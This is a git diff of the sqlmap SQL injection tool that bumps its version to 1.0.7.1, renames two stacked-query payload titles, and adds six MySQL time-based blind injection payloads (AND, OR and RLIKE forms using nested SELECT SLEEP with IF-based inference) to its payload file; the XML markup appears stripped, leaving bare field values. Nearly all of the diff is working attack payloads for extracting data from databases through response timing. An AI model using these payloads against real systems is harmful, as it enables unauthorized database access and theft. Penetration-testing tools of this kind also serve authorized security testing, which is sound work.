diff --git a/lib/core/settings.py b/lib/core/settings.py index 01970d9df..f622c62d4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS from lib.core.revision import getRevisionNumber # sqlmap version (...) -VERSION = "1.0.7.0" +VERSION = "1.0.7.1" REVISION = getRevisionNumber() STABLE = VERSION.count('.') <= 2 VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev") diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml index 0ce0ee825..f0831c29e 100644 --- a/xml/payloads/04_stacked_queries.xml +++ b/xml/payloads/04_stacked_queries.xml @@ -44,7 +44,7 @@ - MySQL > 5.0.11 stacked queries (SLEEP - comment) + MySQL > 5.0.11 stacked queries (query SLEEP - comment) 4 2 1 @@ -65,7 +65,7 @@ - MySQL > 5.0.11 stacked queries (SLEEP) + MySQL > 5.0.11 stacked queries (query SLEEP) 4 3 1 diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml index ca328c0be..a2facddcc 100644 --- a/xml/payloads/05_time_blind.xml +++ b/xml/payloads/05_time_blind.xml @@ -84,6 +84,88 @@ + + MySQL >= 5.0.12 AND time-based blind (query SLEEP) + 5 + 2 + 1 + 1,2,3,9 + 1 + AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (query SLEEP) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment) + 5 + 3 + 1 + 1,2,3,9 + 1 + AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ MySQL <= 5.0.11 AND time-based blind (heavy query) 5 @@ -207,6 +289,47 @@ + + MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP) + 5 + 3 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ MySQL AND time-based blind (ELT) 5